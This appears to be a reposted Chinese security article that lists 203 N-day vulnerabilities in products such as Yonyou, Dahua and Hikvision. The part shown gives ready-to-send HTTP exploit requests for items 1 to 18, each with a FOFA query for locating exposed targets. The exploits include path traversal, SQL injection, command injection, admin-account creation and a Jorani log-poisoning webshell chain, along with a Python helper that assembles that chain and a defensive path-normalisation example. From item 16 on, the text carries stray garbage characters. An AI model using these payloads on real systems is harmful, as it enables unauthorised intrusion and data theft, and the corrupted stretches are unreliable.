Internet Public Vulnerability Compilation, 2023-09 to 2024-06
Daoyi Security (道一安全), 2024-06-05 07:41, Beijing
The following article is reposted from 网络安全新视界 (Cybersecurity New Horizons); author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real attack traffic and of red/blue exercises. This article is meant to help defenders; blue-team readers can use its contents as a checklist for risk review.

Vulnerability sources: the article covers 203 public proof-of-concept (POC) requests for high-impact vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public. For patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few overly long POCs are abbreviated with the placeholder PAYLOAD; search for the full POC if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list": this article is the complete list. Use your browser's find-in-page to search for keywords.

Bookmark this article if it is useful to you, or follow the 网络安全新视界 account.

01 Contents
1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice (红帆iOffice) ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP (jshERP) getAllList information disclosure
16. Hongfan HFOffice (红帆HFOffice医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. Byzoro Smart (百卓Smart) management platform importexport.php SQL injection
61. Zhejiang University Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
65. Youkate (优卡特) Lianaiyun face-recognition management platform 1.0.55.0.0.1 privilege bypass
66. Wanhu ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow control router remote command execution
80. Suda Tianyao (速达天耀) DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. Logbase (思福迪) operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DAS-Security (安恒) Mingyu security gateway aaa_local_web_preview file upload
88. DAS-Security (安恒) Mingyu security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaboration office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QAX (奇安信) Legendsec SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QAX (奇安信) Legendsec SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
122. Beijing Baichuo (百绰) Smart S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 Cloud Mall (H5云商城) file.php file upload
134. Netentsec NS-ASG (网康NS-ASG) application security gateway index.php SQL injection
135. Netentsec NS-ASG (网康NS-ASG) application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. Fujian Kelixun (科立讯) communication command and dispatch platform down_file.php SQL injection
138. Fujian Kelixun (科立讯) communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kelixun (科立讯) communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kelixun (科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
141. Fujian Kelixun (科立讯) communication command and dispatch platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. Tianwei'er (天维尔) fire rescue dispatch platform SQL injection
155. LyLme Spage (六零导航页) file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Infinitt (英飞达) PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) intelligent parking payment system Webservice.asmx arbitrary file upload
162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
164. Smart Campus (慧校园/安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
168. Hjsoft EHR (宏景EHR) OutputCode arbitrary file read
169. Hjsoft EHR (宏景EHR) downlawbase SQL injection
170. Hjsoft EHR (宏景EHR) DisplayExcelCustomReport arbitrary file read
171. Tongtianxing (通天星) CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. Jianwen (建文) engineering management system arbitrary file read
180. Bangguanke CRM (帮管客CRM) jiliyu SQL injection
181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou Tuchuang (图创) library cluster management system updOpuserPw SQL injection
184. Xunrao (迅饶) X2Modbus gateway AddUser arbitrary user creation
185. Realor (瑞友) Tianyi application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
189. Lanwon (蓝网科技) clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. Futong Tianxia (富通天下) foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) Yunjian security management system setsystemtimeaction command execution
194. FE (飞企互联) enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Flyingfish (飞鱼星) internet behavior management system send_order.cgi command execution
196. Henan Fengsu (风速科技) unified authentication platform password reset
197. Zhejiang University Enter (浙大恩特) customer resource management system Quotegask_editAction SQL injection
198. Aliyundrive WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. Hongjianyun EHR (红海云EHR) PtFjk file upload

02 POC List

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Set password to the MD5 of the password you want the new account to have.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin UI with the default account admin first, then send the request below (the stok value in the path is the session token returned by that login). The injected command sits in the wifiRebootrange field.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoding of the following statement (the application decodes it a second time before it reaches the query):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. csrf_test_jorani repeats the csrf cookie, language points two directories up into application/logs, and the login field carries PHP that executes the base64-decoded value of the K1SYJPMHLU4Z request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: send the following request to the target to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command; the log file in the path is named after the server date from the step 1 response.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

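The three-message Jorani chain above, walked through offline as an added example (it is not from the original article or from the Jorani project): it takes the CSRF and session cookies out of the captured step 1 response, derives the date-named log page that step 3 requests from the response Date header, assembles the step 2 form as the page shows it, and decodes the base64 header value. The header name K1SYJPMHLU4Z and all form values are copied from the page; nothing is sent anywhere.

```python
import base64
import re
from email.utils import parsedate_to_datetime

# Response headers captured in step 1 (copied from the page; body omitted).
STEP1_RESPONSE = """\
HTTP/1.1 200 OK
Connection: close
Date: Tue, 24 Oct 2023 09:34:28 GMT
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
"""

# Attacker-chosen header name from the page; PHP exposes it as $_SERVER['HTTP_<NAME>'].
HEADER_NAME = "K1SYJPMHLU4Z"


def parse_set_cookies(raw_response: str) -> dict:
    """Collect name=value from every Set-Cookie header, dropping the attributes."""
    cookies = {}
    for line in raw_response.splitlines():
        if line.lower().startswith("set-cookie:"):
            pair = line.split(":", 1)[1].split(";", 1)[0].strip()
            name, _, value = pair.partition("=")
            cookies[name] = value
    return cookies


def cookie_header(cookies: dict) -> str:
    """Cookie header reused in steps 2 and 3, in the order the page sends them."""
    return "; ".join(f"{k}={cookies[k]}" for k in ("csrf_cookie_jorani", "jorani_session"))


def log_view_path(raw_response: str) -> str:
    """Step 3 reads the day's log via /pages/view/log-<date>; the date is the server's,
    so it is taken from the Date header of the step 1 response, not from the local clock."""
    m = re.search(r"^Date:\s*(.+)$", raw_response, re.M)
    day = parsedate_to_datetime(m.group(1)).date().isoformat()
    return f"/pages/view/log-{day}"


def build_login_form(cookies: dict, header_name: str = HEADER_NAME) -> dict:
    """Step 2 body. csrf_test_jorani must equal the csrf cookie (double-submit check);
    language walks two directories up into application/logs; login carries the PHP
    that runs whatever base64 the attacker later puts in the named request header."""
    stub = (f"<?php if(isset($_SERVER['HTTP_{header_name}']))"
            f"{{system(base64_decode($_SERVER['HTTP_{header_name}']));}} ?>")
    return {
        "csrf_test_jorani": cookies["csrf_cookie_jorani"],
        "last_page": "session/login",
        "language": "../../application/logs",
        "login": stub,
        "CipheredValue": "DummyPassword",
    }


def encode_command(cmd: str) -> str:
    """Value for the K1SYJPMHLU4Z header in step 3."""
    return base64.b64encode(cmd.encode()).decode()


def decode_command(token: str) -> str:
    """What the planted PHP would hand to system() for a given header value."""
    return base64.b64decode(token).decode()


if __name__ == "__main__":
    c = parse_set_cookies(STEP1_RESPONSE)
    print("Cookie:", cookie_header(c))
    print("GET", log_view_path(STEP1_RESPONSE))
    token = "ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs="
    print(f"{HEADER_NAME}: {token}  =>  {decode_command(token)!r}")
```

For defenders the useful observables are the ones this makes explicit: a login POST whose language parameter contains "../", a login value containing "<?php", and later GETs for /pages/view/log-<date> carrying an unusual request header.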
13. Hongfan iOffice (红帆iOffice) ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. The ";.ico" suffix is a path parameter: the login interceptor sees a static-looking URI, while the framework routes the request to getAllList.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. Huaxia ERP (jshERP) getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords. Same idea as above: the ".ico" segment is removed by the "../" before routing.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

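Why the two jshERP requests above get past a login check, shown in Python as an added illustration (this is not jshERP's own code): the naive check is a hypothetical reconstruction of the common mistake, treating any URI that mentions a static-file extension as a public resource, and the hardened check decides on the canonical path the container will actually route. The protected prefix and the extension list are assumptions of this example.

```python
import posixpath
from urllib.parse import unquote

# Assumed for this illustration: extensions a filter might treat as "static, no login"
# and the API prefix that must stay behind authentication.
STATIC_EXTENSIONS = (".ico", ".css", ".js", ".png", ".html")
PROTECTED_PREFIX = "/jshERP-boot/user/"


def naive_requires_login(raw_uri: str) -> bool:
    """Hypothetical vulnerable check: a raw-URI substring test for static extensions.
    Both "getAllList;.ico" and "a.ico/../getAllList" contain ".ico" and are waved through."""
    path = raw_uri.split("?", 1)[0]
    if any(ext in path for ext in STATIC_EXTENSIONS):
        return False
    return path.startswith(PROTECTED_PREFIX)


def normalize_path(raw_uri: str) -> str:
    """Canonicalise the way the servlet container does before dispatch:
    drop the query first (so a decoded '?' cannot create one), percent-decode,
    strip ';matrix' parameters from every segment, then resolve '.' and '..'."""
    path = unquote(raw_uri.split("?", 1)[0])
    if not path.startswith("/"):
        path = "/" + path
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/".join(segments))


def hardened_requires_login(raw_uri: str) -> bool:
    """Decide on the canonical path, and trust an extension only on the final segment
    of a path that is not under the protected prefix."""
    path = normalize_path(raw_uri)
    if path.startswith(PROTECTED_PREFIX):
        return True
    return not path.endswith(STATIC_EXTENSIONS)


if __name__ == "__main__":
    for uri in ("/jshERP-boot/user/getAllList",
                "/jshERP-boot/user/getAllList;.ico",
                "/jshERP-boot/user/a.ico/../getAllList",
                "/jshERP-boot/user/%67etAllList",
                "/jshERP-boot/favicon.ico"):
        print(f"{uri:45} naive={naive_requires_login(uri)!s:5} "
              f"hardened={hardened_requires_login(uri)!s:5} -> {normalize_path(uri)}")
```

The general rule the example encodes: an authorization decision must be made on the same representation of the path that the router uses, after decoding, path-parameter removal and dot-segment resolution; any check that runs on the raw URI text is one encoding trick away from a bypass.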
! I9 H+ r K) o- E S2 A" X9 r16. 红帆HFOffice医微云SQL注入
0 v7 c/ Y( c1 l# ?4 rFOFA:title="HFOffice"! w( s6 E" Y; V" `& X# X$ b" _
poc中调用函数计算1234的md5值
- B# n$ ]7 ]9 N# r% vGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
9 Z, y! ]2 K( L/ `! SHost: x.x.x.x/ M: H" w) r' N8 U6 ~ d8 L
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
& g* a+ U ~0 Z- n3 ~Connection: close7 M: n- j* }! n
Accept: */*
9 q8 h( K5 w% M2 bAccept-Language: en( Q- C3 T: ^% b+ Q5 S% N
Accept-Encoding: gzip+ B- s1 k8 T$ q
n6 F& O! C( ]6 h9 C! K, s& h; R# g& }, J4 }1 g5 u
17. 大华 DSS itcBulletin SQL 注入
; A6 h0 j2 h. P, @/ C! w5 W* dFOFA:app="dahua-DSS"9 M5 P( t; [) k# G
POST /portal/services/itcBulletin?wsdl HTTP/1.1$ c( [8 }, b1 O4 r5 G1 r
Host: x.x.x.x& W7 Q5 {! x2 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, A1 M9 ~0 P- JConnection: close
! ?: R, E" {: t. ?Content-Length: 3452 m5 w& R7 f$ T; N P& @
Accept-Encoding: gzip8 _, f$ T& o5 I
; _! B6 h% w1 I, D<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>2 Q7 u; P, o1 c& M' D
<s11:Body>" Q' Y% f3 R+ H3 b; \
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
9 A9 l( q8 ]( S' [9 G$ g: H% o <netMarkings>7 M) [. f* e, v7 ~( o0 |3 M. r
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
1 V4 V) q3 c* d8 N* ~ </netMarkings>
) m S; [ t+ ]2 Q* h9 \( l$ @ </ns1:deleteBulletin>
2 Z2 P# ?, b: X- i) x Y+ z7 D </s11:Body>
# N3 m0 a- C! v$ o</s11:Envelope>
& o% P! Z7 }) y* k7 @) X- {. f; Y m2 I& r9 T
+ D$ @* J! c6 s7 n& _18. 大华 DSS 数字监控系统 user_edit.action 信息泄露( Z$ a/ o' j8 {) `
FOFA:app="dahua-DSS"
* m( w9 ], C q6 V7 oGET /admin/cascade_/user_edit.action?id=1 HTTP/1.17 L- x: h; ?1 g |" e3 S
Host: your-ip
$ K. o: Z9 ^5 K6 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ u4 J0 P# D/ o- J
Accept-Encoding: gzip, deflate$ E0 d3 Y' @% ~! q
Accept: */*: c4 z6 k: D3 G# m- J6 O
Connection: keep-alive
) r/ }/ k+ E, I7 e
